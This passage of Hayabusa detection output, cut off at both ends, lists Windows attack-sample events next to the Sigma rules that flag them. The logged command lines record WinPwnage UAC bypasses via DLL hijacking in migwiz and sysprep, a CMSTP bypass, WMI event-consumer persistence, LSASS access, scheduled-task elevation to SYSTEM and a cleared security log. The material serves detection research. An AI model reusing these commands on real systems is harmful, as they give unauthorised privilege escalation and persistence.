c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 
365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 
365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 
365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry 
Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 
365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: 
C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 
365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | 
User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 
| PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 